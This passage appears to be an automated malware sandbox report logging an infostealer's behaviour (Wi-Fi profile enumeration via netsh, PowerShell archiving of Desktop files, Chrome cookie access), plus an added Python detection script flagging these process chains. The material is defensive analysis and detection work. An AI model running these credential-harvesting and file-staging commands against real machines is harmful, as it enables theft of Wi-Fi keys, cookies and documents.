Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
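The process-creation records above are the chain behind the "Capture Wi-Fi password" and "Suspicious Script Execution From Temp Folder" signatures listed in the overview: explorha.exe starts rundll32.exe with cred64.dll and clip64.dll from AppData\Roaming (export Main), and that rundll32.exe in turn runs netsh wlan show profiles and a PowerShell Compress-Archive that packs the staged _Files_ directory into the Desktop.zip that rundll32.exe touches later in this section. As an added example that is not part of the report and not the sandbox's own rule set, the following parses records of this shape into a parent/child tree and evaluates a few parent-child rules over them. The sample lines are a constructed subset of the records above; the rule names, the user-writable prefix list and the LOLBin parent list are assumptions of the example.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Process created" records above, verbatim.
SAMPLE = r"""
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
"""

# "Source: <parent> Process created: <image> <command line>"; the image path ends at the
# first ".exe " so paths with spaces (Program Files) still split correctly.
RECORD = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>.+?\.exe) "
                    r"(?P<cmd>.+?)(?: Jump to behavior)?$")

# Directories an unprivileged user can write to (assumed list for this example).
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\programdata\\")
# Living-off-the-land parents that should not normally spawn netsh (assumed list).
LOLBIN_PARENTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def base(path):
    """Lower-cased image name; the same process shows up under System32 and SysWOW64 paths."""
    return path.strip('"').rsplit("\\", 1)[-1].lower()


def rules(parent, image, cmd):
    """Yield the rule names that fire for one parent -> child record."""
    p, c, cl, il = base(parent), base(image), cmd.lower(), image.lower()
    if c == "rundll32.exe" and ".dll" in cl and any(d in cl for d in USER_WRITABLE):
        yield "rundll32-dll-from-user-writable-dir"
    if c == "netsh.exe" and "wlan" in cl and "show profile" in cl and p in LOLBIN_PARENTS:
        # Lists saved Wi-Fi profiles; a follow-up "show profile <name> key=clear" dumps the PSK.
        yield "wlan-profile-enum-from-lolbin"
    if c == "powershell.exe" and "compress-archive" in cl and p == "rundll32.exe":
        yield "powershell-compress-archive-from-rundll32"   # staging collected files as a zip
    if any(d in il for d in USER_WRITABLE):
        yield "execution-from-user-writable-dir"


def evaluate(lines):
    """All (parent, child, rule) findings for a list of report lines."""
    findings = []
    for line in lines:
        m = RECORD.match(line.strip())
        if not m:
            continue
        for rule in rules(m["parent"], m["image"], m["cmd"]):
            findings.append({"parent": base(m["parent"]), "child": base(m["image"]), "rule": rule})
    return findings


def process_tree(lines):
    """Parent image name -> list of child image names, in report order."""
    tree = defaultdict(list)
    for line in lines:
        m = RECORD.match(line.strip())
        if m:
            tree[base(m["parent"])].append(base(m["image"]))
    return dict(tree)


if __name__ == "__main__":
    lines = SAMPLE.strip().splitlines()
    for parent, children in process_tree(lines).items():
        print(parent, "->", ", ".join(children))
    for f in evaluate(lines):
        print(f"{f['parent']} -> {f['child']}: {f['rule']}")
```

Two details matter when porting these rules to real telemetry. The rundll32.exe child is recorded as C:\Windows\SysWOW64\rundll32.exe when created but as C:\Windows\System32\rundll32.exe when it acts as a parent, so matching on the image name rather than the full path keeps the chain intact. And the chrome.exe launch by bad48ea9ac.exe fires nothing here: a signed browser opening a URL is not suspicious by itself, and what makes that record interesting is only its parent's location, which the execution-from-user-writable-dir rule already reported when bad48ea9ac.exe was started.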
Source: bad48ea9ac.exe, 0000000F.00000000.2408172800.00000000008C2000.00000002.00000001.01000000.00000010.sdmp, bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorha.exe, explorha.exe, 00000006.00000002.2914750366.0000000000D18000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 6Program Manager
Source: amert.exe, 0000000C.00000002.2419990538.0000000000EFF000.00000040.00000001.01000000.0000000B.sdmp, chrosha.exe, 00000010.00000002.2898369234.000000000091F000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: oProgram Manager
Source: MPGPH131.exe, 00000026.00000002.2747934122.0000000000902000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: w~Program Manager
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEF436 cpuid 6_2_00AEF436
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\NHPKIZUUSG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Queries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
